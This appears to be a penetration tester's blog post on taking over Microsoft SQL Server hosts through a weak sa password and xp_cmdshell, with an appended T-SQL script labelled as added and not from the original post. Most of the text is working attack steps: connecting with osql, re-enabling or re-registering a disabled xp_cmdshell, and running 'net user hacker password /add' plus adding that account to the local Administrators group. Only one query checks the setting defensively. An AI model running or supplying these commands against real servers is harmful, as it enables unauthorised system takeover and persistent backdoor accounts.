While doing a recent pen test I was reminded not to forget the easy things a DBA might overlook, such as leaving a dangerous stored procedure like xp_cmdshell enabled. Most of us spend our time trying to figure out complex and creative ways to get into systems, but sometimes it's the simple things that get overlooked.
If you find a blank or easy-to-guess sa password and the database is Microsoft SQL Server 7, 2000, or 2005 (xp_cmdshell also exists in Sybase, but there you would use the isql tool), you can use the osql utility to connect to the database and run operating system commands, provided xp_cmdshell is enabled. osql is installed with any MSDE or SQL Server installation. Two things to keep in mind: on SQL Server 2005 xp_cmdshell is disabled by default and has to be switched on with sp_configure (osql is also deprecated there in favor of sqlcmd, although it still works), and whatever you run executes under the SQL Server service account, so what you can do on the box depends on how that service is configured. An older server running as LocalSystem hands you the whole machine.
If xp_cmdshell has been disabled or dropped you can restore it pretty easily as well. Here is an article on this. Note that a Google search will give you more information on restoring xp_cmdshell (even if the .dll was removed).
So what are the commands to use?
osql -S [host name or IP] -U sa -P [password or "" for null]
exec master..xp_cmdshell 'command to run'
go
So, for example, say I want to create a local administrator account on a Windows SQL server with xp_cmdshell enabled:
exec master..xp_cmdshell 'net user hacker password /add'
go
exec master..xp_cmdshell 'net localgroup administrators hacker /add'
go
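The whole sequence above (check whether xp_cmdshell is there, turn it back on if a DBA disabled it, run a command and actually read its output) can be put into one T-SQL script and fed to osql. This is an added example and not from the original post; it assumes you are connected as sa or another sysadmin, and the account name and password are the placeholders from the post. The sp_configure steps are the SQL Server 2005 way; the sp_addextendedproc line is the SQL 7/2000 way and is left commented out.

```sql
-- Added example: audit, enable and use xp_cmdshell from a sysadmin connection.
-- Run with: osql -S [host] -U sa -P [password] -i xp_cmdshell.sql
USE master;
GO

-- 1. Is the extended procedure still registered at all?
--    (master..sysobjects works on 7/2000/2005; xtype 'X' = extended stored procedure)
SELECT name FROM master..sysobjects WHERE name = 'xp_cmdshell' AND xtype = 'X';
GO

-- 2. SQL Server 2005: xp_cmdshell ships disabled. 'show advanced options' has to be
--    on and reconfigured before the xp_cmdshell option is even visible to sp_configure.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO

-- 3. SQL Server 7/2000: if the DBA dropped the procedure, re-register it from the DLL.
--    Only works while xplog70.dll is still in the Binn directory.
-- EXEC sp_addextendedproc 'xp_cmdshell', 'xplog70.dll';
-- GO

-- 4. Run a command and capture its output into a table instead of firing it blind.
--    xp_cmdshell returns one row per line of output (and a trailing NULL row).
CREATE TABLE #out (line NVARCHAR(4000));
INSERT INTO #out EXEC master..xp_cmdshell 'net localgroup administrators';
SELECT line FROM #out WHERE line IS NOT NULL;
DROP TABLE #out;
GO

-- 5. The account-creation trick from the post, same placeholders.
EXEC master..xp_cmdshell 'net user hacker password /add';
EXEC master..xp_cmdshell 'net localgroup administrators hacker /add';
GO

-- 6. What a DBA should be checking (2005 only; value_in_use 1 = enabled).
SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';
GO
```

Step 4 is the part worth copying: capturing the output lets you confirm which account the service runs as and who is already in the local Administrators group before you start adding users, which is also exactly what a DBA should be looking at in step 6 when deciding whether xp_cmdshell has any business being enabled.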
You can run any command you like so you can get creative!
